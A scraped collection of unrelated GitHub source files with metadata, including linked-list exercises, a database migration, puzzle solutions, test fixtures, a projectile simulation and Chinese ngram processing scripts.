int(input(Fore.YELLOW+' Seleccionar una opción del menu\\n'+Fore.RESET+ Fore.RED+' 1. Añadir nodo con raiz cuadrada\\n' ' 2. Eliminar y Añadir al final elevado al cuadrado\\n' ' 3.Invertir la lista\\n Numero ingresado: '+Fore.RESET))\n elif menu_option==1:\n self.punto1()\n self.show_elements()\n break \n elif menu_option ==2:\n self.punto2()\n self.show_elements() \n break\n elif menu_option==3:\n self.punto3()\n self.show_elements()\n break \n \n break\n except ValueError:\n print(Fore.RED+' ERROR, se esperaba un valor númerico'+Fore.RESET) \n\n def shift(self):\n if self.length == 0:\n self.head = None\n self.tail = None\n else:\n delete_node = self.head\n self.head = delete_node.next\n delete_node.next = None\n self.length -= 1\n return print(delete_node.value)\n\n def punto1(self):\n index = int(input(Fore.CYAN+' Ingresa el indice: '+Fore.RESET))\n new_node = self.get(index - 1)\n node_sqrt = math.sqrt(int(new_node.value))\n node_n =self.Node(node_sqrt)\n if self.head == None and self.tail == None:\n self.head = node_n\n self.tail = node_n\n else:\n node_n.next = self.head\n self.head = node_n\n self.length += 1\n\n \n def punto2(self):\n index = int(input(Fore.CYAN+' Ingrese el indice: '+Fore.RESET))\n if index ==0:\n return self.shift()\n elif index == self.length-1 :\n return self.pop() \n elif not index>=self.length or index < 0:\n preview_node=self.get(index-1)\n delete_node=preview_node.next\n preview_node.next = delete_node.next\n delete_node.next =None\n self.new_node_pow(index)\n self.length-=1\n else:\n return None \n \n def new_node_pow(self, delete_node):\n index = int(input(Fore.CYAN+' Ingresa el indice: '+Fore.RESET))\n new_node = self.get(index - 1)\n node_pow = math.pow(int(new_node.value),2)\n node_n =self.Node(node_pow)\n if self.head == None and self.tail == None:\n self.head = node_n\n self.tail = node_n\n else:\n self.tail.next = node_n\n self.tail = node_n\n self.length +=1\n\n def punto3(self):\n reverse_nodes = None\n current_node = self.head\n self.tail = current_node\n\n while current_node !=None:\n next = current_node.next\n current_node.next = reverse_nodes\n reverse_nodes=current_node\n current_node=next\n self.head = reverse_nodes \n #print(self.head)\n \n def show_elements(self):\n array= []\n current_node = self.head\n while current_node != None:\n #Mientras si exista un elemento en la cabeza de la lista, el valor se añade a la lista array\n array.append(current_node.value)\n current_node = current_node.next\n return print(array)\n\n def get(self, index):\n if index == self.length -1:\n return self.tail\n if index == 0:\n return self.head\n elif not(index >= self.length or index <0):\n current_node = self.head\n visit_node_count = 0\n while visit_node_count != index:\n current_node = current_node.next\n visit_node_count += 1\n return current_node\n else:\n return None\n\n ","repo_name":"JhonatanTTamayo/Estructura_Jhonatan","sub_path":"TallerLinked/Taller.py","file_name":"Taller.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10030947470","text":"\"\"\"Added a reason\n\nRevision ID: 9822df1fc63b\nRevises: 123e18112b3f\nCreate Date: 2020-10-29 13:48:31.523472\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '9822df1fc63b'\ndown_revision = '123e18112b3f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('reason',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('reason_id', sa.Integer(), nullable=True),\n sa.Column('reason', sa.String(), nullable=True),\n sa.Column('posted', sa.DateTime(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('reason')\n # ### end Alembic commands ###\n","repo_name":"Josephshitandi/pomodoro","sub_path":"migrations/versions/9822df1fc63b_added_a_reason.py","file_name":"9822df1fc63b_added_a_reason.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10580856028","text":"#입구막기는 2개면 가능하다 즉, 1개로 못막으면? 답은 2개\nimport sys\nfrom collections import deque\ninput = sys.stdin.readline\nmoves = [(-1, 0), (1, 0), (0, -1), (0, 1)]\n\ndef check(i, j):\n q = deque()\n q.append((i, j))\n visit = [[0]*M for _ in range(N)]\n visit[i][j] = 1\n\n while q:\n x, y = q.popleft()\n if x == N-1 and y == M-1:\n return True\n \n for dx, dy in moves:\n nx = x + dx\n ny = y + dy\n\n if 0 <= nx < N and 0 <= ny < M:\n if board[nx][ny] == 0 and visit[nx][ny] == 0:\n q.append((nx, ny))\n visit[nx][ny] = 1\n\n return False\n\nN, M = map(int, input().split())\nboard, walls = [], []\n \nfor i in range(N):\n row = list(map(int, input().split()))\n for j in range(M):\n if (i == 0 and j == 0) or (i == N-1 and j == M-1):\n continue\n if row[j] == 0:\n walls.append((i, j))\n board.append(row)\n\n#0개로도 막히나?\nif not check(0, 0):\n print(0)\nelse:\n for i, j in walls:\n board[i][j] = 1\n if not check(0, 0):\n print(1)\n break\n board[i][j] = 0\n else:\n print(2)","repo_name":"97Kzone/CodeTest_practice","sub_path":"GOMGOM/I.py","file_name":"I.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71545422327","text":"testing = False\r\n\r\nimport shared\r\n\r\ndef countBags(bags, outerBag):\r\n return sum(quantity * (countBags(bags, bag) + 1) for bag, quantity in bags[outerBag].items())\r\n\r\nif testing:\r\n text = shared.read_input(\"input_test\")\r\n #text = shared.read_input(\"input_test2\")\r\nelse:\r\n text = shared.read_input(\"input\")\r\n\r\nbags = shared.parse_rules(text)\r\n\r\nif testing:\r\n print(bags)\r\n\r\ntarget = \"shiny gold\"\r\npart2 = countBags(bags, target)\r\nprint(f\"Individual bags required inside single {target} bag: {part2}\")\r\n\r\nshared.printTimeElapsed()","repo_name":"deadthoma5/AdventOfCode2020","sub_path":"07/7.2.py","file_name":"7.2.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6954200718","text":"from gui.Scaleform.daapi.view.meta.ParamsMeta import ParamsMeta\nfrom CurrentVehicle import g_currentVehicle\nfrom gui.shared import events\nfrom gui.shared.utils import ItemsParameters\nfrom gui.shared.event_bus import EVENT_BUS_SCOPE\n\nclass Params(ParamsMeta):\n\n def __init__(self):\n super(Params, self).__init__()\n\n def update(self):\n data = []\n if g_currentVehicle.isPresent():\n params = ItemsParameters.g_instance.getParameters(g_currentVehicle.item.descriptor)\n if params is not None:\n for p in params:\n data.append({'text': p[0],\n 'param': p[1],\n 'selected': False})\n\n self.as_setValuesS(data)\n return\n\n def _populate(self):\n super(Params, self)._populate()\n self.addListener(events.LobbySimpleEvent.HIGHLIGHT_TANK_PARAMS, self.__onHighlightParams, EVENT_BUS_SCOPE.LOBBY)\n self.update()\n\n def __onHighlightParams(self, event):\n self.as_highlightParamsS(event.ctx.get('type', 'empty'))\n\n def _dispose(self):\n self.removeListener(events.LobbySimpleEvent.HIGHLIGHT_TANK_PARAMS, self.__onHighlightParams, EVENT_BUS_SCOPE.LOBBY)\n super(Params, self)._dispose()\n","repo_name":"Omegaice/WOTDecompiled","sub_path":"res/scripts/client/gui/scaleform/daapi/view/lobby/hangar/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"13188485542","text":"# Good morning! Here's your coding interview problem for today.\n\n# This problem was asked by Stripe.\n\n# Given an array of integers, find the first missing positive integer in linear time and constant space. \n# In other words, find the lowest positive integer that does not exist in the array. The array can contain duplicates and negative numbers as well.\n\n# For example, the input [3, 4, -1, 1] should give 2. The input [1, 2, 0] should give 3.\n\n# You can modify the input array in-place.\n\ndef solve(arr):\n arr.sort()\n intresult = arr[0]\n for x in range(len(arr)):\n if(arr[x]-intresult<=1 or arr[x] <=0):\n intresult= arr[x]\n else:\n while(intresult!=arr[x]):\n intresult+=1\n if(intresult>0 and intresult!=arr[x]):\n return intresult\n\n\n return intresult+1\n\n\ndef main():\n arr1 = [3, 4, -1, 1]\n arr2 = [1, 2, 0]\n arr3 = [-3,-1, 1, 3] ##should return 2\n arr4 = [-3,-1, 2] ##should return 1\n print(solve(arr1))\n print(solve(arr2))\n print(solve(arr3))\n print(solve(arr4))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Joseph22Jct/Daily-Coding-Problems","sub_path":"Problem 4/problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15096254989","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport global_list as gl\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nclass BasicAnalysis(object):\n\n def basic_info(data):\n data = pd.read_csv(gl.TEST_FOREX_RESULT_PATH + 'xauusdd_form.csv')[1:]\n print(data[:8])\n print(\"------------------------------------------------------------------\")\n print(data.describe())\n\n def show_p_change(data):\n data = pd.read_csv(gl.TEST_FOREX_RESULT_PATH + 'xauusdd_form.csv')[1:]\n plt.plot(data['fclose'])\n plt.show()\n plt.plot(data['p_change'])\n plt.show()\n\n\n# Simple test\n\nb = BasicAnalysis()\nbi = b.basic_info()\nspc = b.show_p_change()","repo_name":"pan-cai/quantist3","sub_path":"quantist3/ok/technical/basic_analysis.py","file_name":"basic_analysis.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"463260311","text":"import random\nimport uuid\nfrom datetime import datetime\n\nimport pytest_asyncio\n\nfrom polar.enums import Platforms\nfrom polar.integrations.github.service import (\n github_organization,\n github_repository,\n)\nfrom polar.models.issue import Issue\nfrom polar.models.organization import Organization\nfrom polar.models.pledge import Pledge\nfrom polar.models.pull_request import PullRequest\nfrom polar.models.repository import Repository\nfrom polar.models.user import User\nfrom polar.organization.schemas import OrganizationCreate\nfrom polar.pledge.schemas import PledgeState\nfrom polar.postgres import AsyncSession\nfrom polar.repository.schemas import RepositoryCreate\n\n\n@pytest_asyncio.fixture\nasync def predictable_organization(session: AsyncSession) -> Organization:\n create_schema = OrganizationCreate(\n platform=Platforms.github,\n name=\"testorg\",\n external_id=random.randrange(5000),\n avatar_url=\"http://avatar_url\",\n is_personal=False,\n installation_id=random.randrange(5000),\n installation_created_at=datetime.now(),\n installation_updated_at=datetime.now(),\n installation_suspended_at=None,\n )\n\n org = await github_organization.create(session, create_schema)\n session.add(org)\n await session.commit()\n return org\n\n\n@pytest_asyncio.fixture\nasync def predictable_pledging_organization(session: AsyncSession) -> Organization:\n create_schema = OrganizationCreate(\n platform=Platforms.github,\n name=\"pledging_org\",\n external_id=random.randrange(5000),\n avatar_url=\"http://avatar_url\",\n is_personal=False,\n installation_id=random.randrange(5000),\n installation_created_at=datetime.now(),\n installation_updated_at=datetime.now(),\n installation_suspended_at=None,\n )\n\n org = await github_organization.create(session, create_schema)\n session.add(org)\n await session.commit()\n return org\n\n\n@pytest_asyncio.fixture\nasync def predictable_repository(\n session: AsyncSession, predictable_organization: Organization\n) -> Repository:\n create_schema = RepositoryCreate(\n platform=Platforms.github,\n name=\"testrepo\",\n organization_id=predictable_organization.id,\n external_id=random.randrange(5000),\n is_private=True,\n )\n repo = await github_repository.create(session, create_schema)\n session.add(repo)\n await session.commit()\n return repo\n\n\n@pytest_asyncio.fixture\nasync def predictable_issue(\n session: AsyncSession,\n predictable_organization: Organization,\n predictable_repository: Repository,\n) -> Issue:\n issue = await Issue.create(\n session=session,\n id=uuid.uuid4(),\n organization_id=predictable_organization.id,\n repository_id=predictable_repository.id,\n title=\"issue title\",\n number=123,\n platform=Platforms.github,\n external_id=random.randrange(5000),\n state=\"open\",\n issue_created_at=datetime.now(),\n issue_modified_at=datetime.now(),\n )\n\n await session.commit()\n return issue\n\n\n@pytest_asyncio.fixture\nasync def predictable_user(\n session: AsyncSession,\n) -> User:\n user = await User.create(\n session=session,\n id=uuid.uuid4(),\n username=\"foobar\",\n email=\"test@example.com\",\n )\n\n await session.commit()\n return user\n\n\n@pytest_asyncio.fixture\nasync def predictable_pledge(\n session: AsyncSession,\n predictable_organization: Organization,\n predictable_repository: Repository,\n predictable_issue: Issue,\n predictable_pledging_organization: Organization,\n) -> Pledge:\n pledge = await Pledge.create(\n session=session,\n id=uuid.uuid4(),\n by_organization_id=predictable_pledging_organization.id,\n issue_id=predictable_issue.id,\n repository_id=predictable_repository.id,\n organization_id=predictable_organization.id,\n amount=12345,\n fee=123,\n state=PledgeState.created,\n )\n\n await session.commit()\n return pledge\n\n\n@pytest_asyncio.fixture\nasync def predictable_pull_request(\n session: AsyncSession,\n predictable_organization: Organization,\n predictable_repository: Repository,\n) -> PullRequest:\n pr = await PullRequest.create(\n session=session,\n id=uuid.uuid4(),\n repository_id=predictable_repository.id,\n organization_id=predictable_organization.id,\n number=5555,\n external_id=random.randrange(5000),\n title=\"PR Title\",\n author={\"login\": \"pr_creator_login\"},\n platform=Platforms.github,\n state=\"open\",\n issue_created_at=datetime.now(),\n issue_modified_at=datetime.now(),\n )\n\n await session.commit()\n return pr\n","repo_name":"polarsource/polar","sub_path":"server/tests/fixtures/predictable_objects.py","file_name":"predictable_objects.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","stars":736,"dataset":"github-code","pt":"76"} +{"seq_id":"43020515528","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: set et ai sta sw=2 ts=2 tw=0:\n\"\"\"\nGraphical BootSetup.\n\"\"\"\nfrom __future__ import unicode_literals\n\n__copyright__ = 'Copyright 2013-2014, Salix OS'\n__license__ = 'GPL2+'\n\nimport os\nimport sys\nimport gettext\nimport gtk\nimport gtk.glade\nfrom bootsetup import *\nfrom gathergui import *\n\nclass BootSetupGtk(BootSetup):\n def run_setup(self):\n gtk.glade.bindtextdomain(self._appName, self._localeDir)\n gtk.glade.textdomain(self._appName)\n if not (self._isTest and self._useTestData) and os.getuid() != 0:\n self.error_dialog(_(\"Root privileges are required to run this program.\"), _(\"Sorry!\"))\n sys.exit(1)\n gg = GatherGui(self, self._version, self._bootloader, self._targetPartition, self._isTest, self._useTestData)\n gg.run()\n \n def info_dialog(self, message, title = None, parent = None):\n dialog = gtk.MessageDialog(parent = parent, type = gtk.MESSAGE_INFO, buttons = gtk.BUTTONS_OK, flags = gtk.DIALOG_MODAL)\n if title:\n msg = \"{0}\\n\\n{1}\".format(unicode(title), unicode(message))\n else:\n msg = message\n dialog.set_markup(msg)\n result_info = dialog.run()\n dialog.destroy()\n return result_info\n\n def error_dialog(self, message, title = None, parent = None):\n dialog = gtk.MessageDialog(parent = parent, type = gtk.MESSAGE_ERROR, buttons = gtk.BUTTONS_CLOSE, flags = gtk.DIALOG_MODAL)\n if title:\n msg = \"{0}\\n\\n{1}\".format(unicode(title), unicode(message))\n else:\n msg = message\n dialog.set_markup(msg)\n result_error = dialog.run()\n dialog.destroy()\n return result_error\n","repo_name":"mimosa67/bootsetup","sub_path":"src/lib/bootsetup_gtk.py","file_name":"bootsetup_gtk.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"35970700719","text":"\"\"\"Create logger which can be passed to other modules.\"\"\"\n\nimport logging.config\nfrom pathlib import Path\n\nimport yaml\nfrom colorlog import ColoredFormatter\n\n\ndef logger_setup(json_data: dict):\n \"\"\"Create logger which can be passed to other modules.\"\"\"\n \n # Create the 'Log' folder if it doesn't exist\n log_folder = Path.joinpath(json_data.get(\"work_dir\"), json_data.get(\"log_path\"))\n log_folder.mkdir(exist_ok=True)\n\n # Read in logger config yaml file with safe load\n with open(json_data.pop(\"logger_path\"), 'r') as f:\n config_dict = yaml.safe_load(f)\n\n # Update logger file path to include the working directory\n log_file_path = Path.joinpath(json_data.get(\"work_dir\"), config_dict[\"handlers\"][\"file\"][\"filename\"])\n\n # Create the debugging_file.log if it doesn't exist\n if not log_file_path.exists():\n with open(log_file_path, 'w') as file:\n pass\n\n # Update logger configuration with the new file path\n config_dict[\"handlers\"][\"file\"][\"filename\"] = log_file_path\n\n # Set up console logging based on config_json, set False if not found\n if json_data.pop(\"logging_colors\", False):\n config_dict['handlers']['console']['formatter'] = 'colorFormatter'\n\n # Create color formatter for console output\n color_formatter = ColoredFormatter(\n config_dict[\"formatters\"]['colorFormatter']['format'],\n log_colors=config_dict[\"formatters\"]['colorFormatter']['log_colors'],\n reset=True,\n )\n\n # Update console handler with the color formatter\n config_dict['handlers']['console']['formatter'] = 'color'\n config_dict['formatters']['color'] = {\n '()': color_formatter.__class__,\n 'format': color_formatter._fmt,\n 'log_colors': color_formatter.log_colors\n }\n else:\n config_dict['handlers']['console']['formatter'] = 'consoleFormatter'\n\n # create logger\n logging.config.dictConfig(config_dict)\n logger = logging.getLogger(\"main\")\n return logger\n","repo_name":"mrstevencervantes/Python-Project-Template-Exe","sub_path":"Automation/Config/logger_module.py","file_name":"logger_module.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23725376941","text":"import pickle\nfrom os import listdir\nimport os.path\nfrom utilitarian import QuickDataFrame\n\n\"\"\" We named our list of classifier-words \"Super words\"\n The data structure is a Python dictionary of years -> dict of classifiers-> dict of words -> frequencies\n e.g. s_words[1987]['份']['日志'] is 4, meaning that in google ngrams dataset the frequency of the use of \n the classifier '份' with the context noun '日志' in the year of 1987 is 4\n\"\"\"\n\n\ndef save_classifier_nouns():\n # this super words list is not like the final super_words (i.e. does not have time stamps and frequency data)\n super_words = dict()\n with open('./data/gwc2016_classifiers/lemma_dictionary_tao1.txt', encoding='utf-8') as infile:\n # ChineseLemma \\t Classifier \\t FrequencyCount\n for line in infile:\n if len(line) < 2 or line[0] == '#':\n continue\n context, classifier, freq = line.split('\\t')\n if int(freq) > 1:\n if classifier not in super_words:\n super_words[classifier] = set()\n super_words[classifier].add(context)\n\n # deleting categories with less than 10 instances\n bad_cats = set()\n for cat, words in super_words.items():\n if len(words) < 10:\n bad_cats.add(cat)\n for cat in bad_cats:\n del super_words[cat]\n print(len(bad_cats), 'categories removed due to having less than 10 instances')\n super_words = {2010: super_words}\n with open('./data/super_words-chi-Luis.pkl', 'wb') as super_file:\n pickle.dump(super_words, super_file)\n\n\ndef save_time_stamps():\n with open('./data/super_words-chi-Luis.pkl', 'rb') as super_file:\n super_words = pickle.load(super_file)\n\n if os.path.isfile('./data/time_stamp_data_luis(w2v).pkl'):\n with open('./data/time_stamp_data_luis(w2v).pkl', 'rb') as infile:\n time_stamps = pickle.load(infile)\n else:\n # initialise time_stamps for each combination of \"classifier context\"\n time_stamps = dict()\n for decade, cats in super_words.items():\n for cat, words in cats.items():\n for word in words:\n query = cat + word\n time_stamps[query] = []\n\n if os.path.isfile('./data/checked_files(w2v).pkl'):\n with open('./data/checked_files(w2v).pkl', 'rb') as infile:\n checked_files = pickle.load(infile)\n else:\n checked_files = set()\n\n ngram_path = '/media/disk_ngram2/ngram_classifier_data/' # path to the folder of google chinese ngrams\n file_names_list = listdir(ngram_path)\n i = 0\n for file_name in file_names_list:\n i += 1\n if file_name in checked_files:\n continue\n print(i, 'of', len(file_names_list))\n with open(ngram_path + file_name, 'r', encoding='utf-8') as infile:\n for line in infile:\n try:\n ngram = line.partition('\\t')[0]\n ngram_ref = ngram.replace(' ', '')\n ngram_ref = ngram_ref.replace('_NOUN', '')\n if ngram_ref in time_stamps:\n time_stamps[ngram_ref].append(line.strip())\n except Exception as e:\n print(e, line)\n checked_files.add(file_name)\n if i % 50 == 0:\n with open('./data/checked_files(w2v).pkl', 'wb') as outfile:\n pickle.dump(checked_files, outfile)\n with open('./data/time_stamp_data_luis(w2v).pkl', 'wb') as outfile:\n pickle.dump(time_stamps, outfile)\n\n with open('./data/checked_files(w2v).pkl', 'wb') as outfile:\n pickle.dump(checked_files, outfile)\n # save time_stamp data to file:\n with open('./data/time_stamp_data_luis(w2v).pkl', 'wb') as outfile:\n pickle.dump(time_stamps, outfile)\n\n\ndef build_super_words():\n \"\"\"make a dict of dict of dict : super_word[year][classifier][context]=frequency\"\"\"\n\n with open('./data/time_stamp_data_luis(w2v).pkl', 'rb') as infile:\n timestamps = pickle.load(infile)\n\n # load the list of w2v to filter out the words that are not covered by our w2v\n with open('./data/w2v-chi.pkl', 'rb') as in_file:\n word_list = pickle.load(in_file)\n\n with open('./data/super_words-chi-Luis.pkl', 'rb') as super_file:\n # super words without time data\n s_words = pickle.load(super_file)\n\n # make lists of all contexts that are also in FasText and all classifiers\n classifiers = []\n for clsf, cntx in s_words[2010].items():\n classifiers.append(clsf)\n\n # make a dict of all years and create dicts for each\n super_words = dict()\n for year in range(1940, 2010):\n super_words[year] = dict()\n for cat in classifiers:\n super_words[year][cat] = dict()\n\n # fill in the frequencies\n for cat, wrds in s_words[2010].items():\n for wrd in wrds:\n if cat + wrd not in timestamps or wrd not in word_list or len(wrd) < 2:\n continue\n query_ngram = cat + wrd + '_NOUN'\n for item in timestamps[cat + wrd]:\n try:\n ngram, year, freq, books = item.split('\\t')\n ngram = ngram.replace(' ', '')\n if ngram != query_ngram:\n continue\n year = int(year)\n if year in super_words:\n super_words[year][cat][wrd] = int(freq)\n except Exception as e:\n print(e)\n\n with open('./data/super_words-chi-Luis-YbyY(w2v).pkl', 'wb') as super_file:\n pickle.dump(super_words, super_file)\n\n","repo_name":"AmirAhmadHabibi/ChainingClassifiers","sub_path":"super_words_builder.py","file_name":"super_words_builder.py","file_ext":"py","file_size_in_byte":5678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24768031703","text":"from collections import defaultdict\n\nclass TreeTraversal:\n def __init__(self):\n self.graph = defaultdict(list)\n\n def dfs(self, curr, prev):\n for neighbor in self.graph[curr]:\n if neighbor != prev:\n self.dfs(neighbor, curr)\n # print(curr)\n\n def count_nodes(self, curr, prev):\n count = 1\n for neighbor in self.graph[curr]:\n if neighbor != prev:\n count += self.count_nodes(neighbor, curr)\n return count\n\n def max_length(self, curr, prev):\n \"\"\"\n max length from root to leaf\n \"\"\"\n max_so_far = 0\n for neighbor in self.graph[curr]:\n if neighbor != prev:\n max_so_far = max(max_so_far, self.max_length(neighbor, curr))\n return max_so_far + 1\n\n def add_edge(self, u, v):\n self.graph[u].append(v)\n self.graph[v].append(u)\n\n\ntt = TreeTraversal()\ntt.add_edge(1,2)\ntt.add_edge(1,3)\ntt.add_edge(1,4)\ntt.add_edge(2,5)\ntt.add_edge(2,6)\ntt.add_edge(6,8)\ntt.add_edge(4,7)\n\ntt.dfs(1, 0)\nassert tt.max_length(1, 0) == 4\nassert tt.count_nodes(1, 0) == 8\n\nclass Node:\n def __init__(self, val):\n self.left = None\n self.right = None\n self.val = val\n\nclass BinaryTree:\n def create_tree(self, nums, i):\n if i >= len(nums):\n return\n elif not nums[i]:\n return None\n node = Node(nums[i])\n node.left = self.create_tree(nums, 2*i+1)\n node.right = self.create_tree(nums, 2*i+2)\n return node\n\n def in_order(self, node, order):\n if not node:\n return\n self.in_order(node.left, order)\n order.append(node.val)\n self.in_order(node.right, order)\n\n def post_order(self, node, order):\n if not node:\n return\n self.post_order(node.left, order)\n self.post_order(node.right, order)\n order.append(node.val)\n\n def pre_order(self, node, order):\n if not node:\n return\n order.append(node.val)\n self.pre_order(node.left, order)\n self.pre_order(node.right, order)\n\nheap = [1, 2, 3, 4, 5, None, 7, None, None, 6]\nbt = BinaryTree()\nroot = bt.create_tree(heap, 0)\nin_order = []\nbt.in_order(root, in_order)\npost_order = []\nbt.post_order(root, post_order)\npre_order = []\nbt.pre_order(root, pre_order)\n\nassert in_order == [4, 2, 6, 5, 1, 3, 7]\nassert post_order == [4, 6, 5, 2, 7, 3, 1]\nassert pre_order == [1, 2, 4, 5, 6, 3, 7]\n","repo_name":"kcajheish/leetcode","sub_path":"algorithm/tree_traversal.py","file_name":"tree_traversal.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16496989237","text":"from Vectors import *\nfrom math import sin, radians, cos\nfrom Ball import Ball\n\nballs = []\n\nlaunch_height = 96.952\nlaunch_speed = 60\n\npi = 3.14159265359\n\nnum_balls = 40\n\nfor i in range(num_balls):\n # inputs\n # launch_angle = random(0, 90)\n dd = random(0, 500)\n\n # v = Vec(launch_speed * cos(radians(launch_angle)), launch_speed * sin(radians(launch_angle)), 0)\n v = Vec(launch_speed, 0, 0)\n launch_height = 96.952\n \n ball = Ball(launch_height, v, dd)\n balls.append(ball)\n\ng = Vec(0, -9.8, 0)\n\nm = 0.6\nFg=Vmult(g,m)\n\ndt = 0.05\n\nt = 0\n\ncounter = 0\n\nradius = 0.12\n\nairdrag_coeff = 0.5\nfront_facing_area = radius * radius * PI\nair_density = 1.2\n\nwind = Vec(-10, 0, 0)\n\nrecord_balls = []\n\nmagnus_coeff = 5e-5\nlaunch_spin = Vec(0, 0, 200)\n\n\ndef magnus_force(mc, spin, vel):\n relative_velocity = Vsub(vel, wind)\n fl = Vmult(Vcprod(spin, relative_velocity), mc)\n return fl\n\ndef airdrag(velocity, adc, ffa, ad):\n relative_velocity = Vsub(velocity, wind)\n fd = -0.5 * adc * ffa * ad * Vmag(relative_velocity) * Vmag(relative_velocity)\n return Vmult(Norm(velocity), fd)\n\ndef move():\n global t, dt, max_height, record_balls, balls, new_balls, counter, launch_height\n \n if len(balls) == 0:\n # sort balls in order of greatest to least distance\n sorted_balls = sorted(record_balls, key=lambda x:x[1])\n \n new_balls = []\n \n # get 5 best performing balls\n for i in range(5):\n dd = sorted_balls[i][0]\n # v = Vec(launch_speed * cos(radians(ang)), launch_speed * sin(radians(ang)), 0)\n new_balls.append(Ball(launch_height, Vec(60, 0, 0), dd))\n \n for i in range(5):\n std = 10 - counter * 0.5\n old = new_balls[i].drop\n launch_height = 96.952\n # make 7 kids per ball\n for j in range(num_balls//5-1):\n # using inverse standard normal distribution\n new = sqrt(-2 * log(random(0, 1))) * cos(2 * pi * random(0, 1)) * std + old\n # ang = random(theta-3+counter*0.6, theta+3-counter*0.4)\n v = Vec(60, 0, 0)\n new_balls.append(Ball(launch_height, v, new))\n \n balls = [x for x in new_balls]\n \n counter += 1\n\n print(\"Generation: \" + str(counter))\n print(\"Height: \" + str(launch_height))\n print(\"Drop: \" + str(sorted_balls[0][0]))\n print(\"Time: \" + str(sorted_balls[0][0]/60))\n print(\"Dist From 200: \" + str(sorted_balls[0][1]))\n print(\" \")\n \n # print(len(balls))\n \n # print(len(balls))\n \n # actually applies force and moves each ball\n for ball in balls:\n \n # F = Vadd(Fg, airdrag(ball.vel, airdrag_coeff, front_facing_area, air_density), magnus_force(magnus_coeff, launch_spin, ball.vel))\n F = Vadd(Fg, airdrag(ball.vel, airdrag_coeff, front_facing_area, air_density))\n a = Vdiv(F, m)\n ball.updateVel(a, dt)\n ball.move(dt)\n \n t += dt\n \n # if ball is on ground remove from list and record it\n if ball.pos.y <= 0:\n record_balls.append([ball.drop, abs(200-ball.pos.x)])\n balls.remove(ball)\n \n return balls\n \n \n","repo_name":"jbajaj6/processing_comp_phys","sub_path":"dpps/Engine.py","file_name":"Engine.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41581604942","text":"''' 내가 짠 코드의 풀이조건 -> 같은것이 있는 순열 구하는 공식 이용\n# 같은 것이 있는 순열 구하는 공식\n순열이 같은 것이 포함된 원소들을 나열하는 경우의 수는 나열하는 원소의 팩토리얼에 중복된 원소들의 팩토리얼을 나누어주면 된다.\n예를 들어 aaabb와 같은 경우 a가 3개이고 b가 2개이므로 5!을 3!와 2!로 나누어주면 된다.\nex) [a, a, a, b, b] -> 5! / 3!2! = 10\n'''\n\ndef solution(n):\n res = 0\n dp_facto = [1]*(n+1)\n for i in range(2, n+1):\n dp_facto[i] = dp_facto[i-1]*i\n \n for i in range(n//2 + 1):\n cntOne = n - i*2\n arr = [1]*cntOne + [2]*i\n if all(x == 1 for x in arr) or all(x == 2 for x in arr):\n res += 1\n else:\n res += dp_facto[len(arr)] // (dp_facto[cntOne] * dp_facto[i])\n return res % 1234567\n\n####################################################################################################\n\n''' 다른 사람의 풀이 -> 피보나치 수열 이용\n이 문제의 테스트 케이스의 일부를 아래의 예시로 확인하면,\nn = 1, result = 1\nn = 2, result = 2\nn = 3, result = 3\nn = 4, result = 5\nn = 5, result = 8\nn = 6, result = 13\nn = 7, result = 21\nn = 8, result = 34\nn이 1부터 8번 까지의 테스트케이스 결과값은 위와 같다.\n\n1, 2, 3, 5, 8, 13, 21, 34 ... -> 이는 피보나치 수열과 유사하다.\n이 수열의 맨 앞에 1만 하나 더 붙이면 피보나치 수열 그 자체가 되는 것이다.\n1, 1, 2, 3, 5, 8, 13, 21, 34 ...\n=> 1, 1, (1+1), (1+2), (2+3), (3+5), (5+8), (8+13), (13+21)\ndp를 이용하여 피보나치 수열을 구현하면 된다.\n\n# 위의 해설을 이용한 두번째 코드\ndef solution(n):\n dp_fibo = [0] * (n+2)\n dp_fibo[1], dp_fibo[2] = 1, 1\n for i in range(3, n+2):\n dp_fibo[i] = dp_fibo[i-1] + dp_fibo[i-2]\n \n return 